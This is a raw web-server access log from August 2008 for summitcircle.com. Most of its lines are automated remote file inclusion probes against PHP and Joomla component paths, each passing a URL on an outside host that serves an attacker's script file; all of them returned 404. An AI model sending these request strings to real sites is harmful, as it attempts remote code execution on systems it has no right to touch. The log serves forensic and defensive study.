89.218.85.18 - - [17/Aug/2008:17:00:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [17/Aug/2008:17:00:22 -0700] "GET //skin/zero_vote/error.php?dir=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.199.250.122 - - [17/Aug/2008:17:01:15 -0700] "GET /logs/access_080505.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.240.146 - - [17/Aug/2008:17:01:49 -0700] "GET /logs/access_080331.log//includes/messages.inc.php?include_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.53.240.146 - - [17/Aug/2008:17:01:49 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.53.240.146 - - [17/Aug/2008:17:01:49 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.69.234.125 - - [17/Aug/2008:17:02:03 -0700] "GET /logs/access.log/index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.69.234.125 - - [17/Aug/2008:17:02:03 -0700] "GET /index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.69.234.125 - - [17/Aug/2008:17:02:03 -0700] "GET /logs/index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.53.240.146 - - [17/Aug/2008:17:02:20 -0700] "GET /logs/access_080324.log//includes/messages.inc.php?include_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
146.155.63.15 - - [17/Aug/2008:17:02:39 -0700] "GET /logs/access_080210.log/index1.php?=http://jackou06.free.fr/site/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
146.155.63.15 - - [17/Aug/2008:17:02:39 -0700] "GET /index1.php?=http://jackou06.free.fr/site/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
146.155.63.15 - - [17/Aug/2008:17:02:39 -0700] "GET /logs/index1.php?=http://jackou06.free.fr/site/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
66.197.234.53 - - [17/Aug/2008:17:03:00 -0700] "GET /index2.php?page=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
81.31.148.15 - - [17/Aug/2008:17:03:01 -0700] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
81.31.148.15 - - [17/Aug/2008:17:03:01 -0700] "GET //oneadmin/newspublish/include.php?path[docroot]=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.197.234.53 - - [17/Aug/2008:17:03:05 -0700] "GET /logs/index2.php?page=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
61.19.242.44 - - [17/Aug/2008:17:03:14 -0700] "GET /logs/access.log/index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
61.19.242.44 - - [17/Aug/2008:17:03:15 -0700] "GET /index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
61.19.242.44 - - [17/Aug/2008:17:03:16 -0700] "GET /logs/index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
81.31.148.15 - - [17/Aug/2008:17:03:20 -0700] "GET /logs/access_071203.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
81.31.148.15 - - [17/Aug/2008:17:03:21 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
81.31.148.15 - - [17/Aug/2008:17:03:21 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:03:46 -0700] "GET /logs/access_080505.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:03:50 -0700] "GET /logs/access_080505.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.89.233.48 - - [17/Aug/2008:17:03:53 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
80.89.233.48 - - [17/Aug/2008:17:03:53 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
87.106.4.147 - - [17/Aug/2008:17:04:08 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.summitcircle.com"
87.106.4.147 - - [17/Aug/2008:17:04:08 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.summitcircle.com"
81.31.148.15 - - [17/Aug/2008:17:04:09 -0700] "GET /logs/access_071217.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.61.129.237 - - [17/Aug/2008:17:04:31 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
204.15.211.146 - - [17/Aug/2008:17:04:32 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
204.15.211.146 - - [17/Aug/2008:17:04:32 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
212.61.129.237 - - [17/Aug/2008:17:04:32 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:06:05 -0700] "GET /logs/access_080505.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.16.155 - - [17/Aug/2008:17:06:07 -0700] "GET /logs/access_071231.log/lib/functions.php?DOC_ROOT=http://www.thauros-clan.de/splash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.16.155 - - [17/Aug/2008:17:06:07 -0700] "GET /lib/functions.php?DOC_ROOT=http://www.thauros-clan.de/splash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.16.155 - - [17/Aug/2008:17:06:08 -0700] "GET /logs/lib/functions.php?DOC_ROOT=http://www.thauros-clan.de/splash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
190.47.109.27 - - [17/Aug/2008:17:06:15 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
190.47.109.27 - - [17/Aug/2008:17:06:15 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:06:19 -0700] "GET /logs/access_071111.log//modules/xt_conteudo/admin/spaw/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:06:19 -0700] "GET //modules/xt_conteudo/admin/spaw/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:06:19 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:06:23 -0700] "GET /logs/access_080331.log//modules/xt_conteudo/admin/spaw/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:07:01 -0700] "GET /logs/access_080414.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:07:01 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:07:01 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:07:17 -0700] "GET /logs/access_080414.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:07:17 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:07:17 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:07:38 -0700] "GET /logs/access_080210.log/index.php3?pg=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:07:52 -0700] "GET /index.php3?pg=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:08:03 -0700] "GET /logs/index.php3?pg=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:10:01 -0700] "GET /logs/access_080331.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:10:27 -0700] "GET /logs/access_080331.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:10:56 -0700] "GET /logs/access_080414.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:10:56 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:10:56 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:11:01 -0700] "GET /logs/access_080414.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:11:01 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:11:01 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:11:05 -0700] "GET /logs/access_080317.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:11:05 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:11:05 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:11:08 -0700] "GET /logs/access_080407.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
61.19.242.44 - - [17/Aug/2008:17:12:46 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.summitcircle.com"
61.19.242.44 - - [17/Aug/2008:17:12:46 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:12:54 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:13:26 -0700] "GET /logs/access_071231.log/index.php3?pg=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
76.91.239.253 - - [17/Aug/2008:17:14:28 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2000.2472-big; Windows XP 5.1; MSIE 7.0.5730.11)" "summitcircle.com"
76.91.239.253 - - [17/Aug/2008:17:14:28 -0700] "GET /favicon.gif HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2000.2472-big; Windows XP 5.1; MSIE 7.0.5730.11)" "summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:16:11 -0700] "GET /logs/access_080331.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
76.195.200.137 - - [17/Aug/2008:17:16:21 -0700] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.summitcircle.com"
76.195.200.137 - - [17/Aug/2008:17:16:21 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:16:23 -0700] "GET /logs/access_080331.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:16:46 -0700] "GET /logs/access_080414.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:16:46 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:16:47 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
80.89.233.48 - - [17/Aug/2008:17:21:21 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
80.89.233.48 - - [17/Aug/2008:17:21:21 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
87.106.4.147 - - [17/Aug/2008:17:21:59 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.summitcircle.com"
87.106.4.147 - - [17/Aug/2008:17:21:59 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.summitcircle.com"
216.150.225.244 - - [17/Aug/2008:17:22:35 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.summitcircle.com"
216.150.225.244 - - [17/Aug/2008:17:22:35 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.summitcircle.com"
204.15.211.146 - - [17/Aug/2008:17:23:00 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
204.15.211.146 - - [17/Aug/2008:17:23:00 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
190.47.109.27 - - [17/Aug/2008:17:23:39 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
190.47.109.27 - - [17/Aug/2008:17:23:40 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
216.150.225.244 - - [17/Aug/2008:17:23:50 -0700] "GET /logs/access_071217.log/index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
200.171.245.29 - - [17/Aug/2008:17:24:08 -0700] "GET /logs/access_080324.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://eskentx.kit.net/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:24:20 -0700] "GET /logs/access_071203.log//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:24:20 -0700] "GET //skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:24:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:24:35 -0700] "GET /logs/access_080331.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
74.53.240.146 - - [17/Aug/2008:17:24:53 -0700] "GET /logs/access_080310.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.53.240.146 - - [17/Aug/2008:17:24:53 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.53.240.146 - - [17/Aug/2008:17:24:54 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.53.240.146 - - [17/Aug/2008:17:25:11 -0700] "GET /logs/access_080317.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
72.248.189.82 - - [17/Aug/2008:17:25:22 -0700] "GET /logs/access_071112.log/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.248.189.82 - - [17/Aug/2008:17:25:22 -0700] "GET /logs/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.248.189.82 - - [17/Aug/2008:17:25:23 -0700] "GET /vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.61.129.237 - - [17/Aug/2008:17:25:35 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
61.19.242.44 - - [17/Aug/2008:17:25:35 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.summitcircle.com"
61.19.242.44 - - [17/Aug/2008:17:25:35 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.summitcircle.com"
212.61.129.237 - - [17/Aug/2008:17:25:36 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.efnetbr.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
76.91.239.253 - - [17/Aug/2008:17:25:46 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2000.2472-big; Windows XP 5.1; MSIE 7.0.5730.11)" "summitcircle.com"
76.91.239.253 - - [17/Aug/2008:17:25:46 -0700] "GET /favicon.gif HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2000.2472-big; Windows XP 5.1; MSIE 7.0.5730.11)" "summitcircle.com"
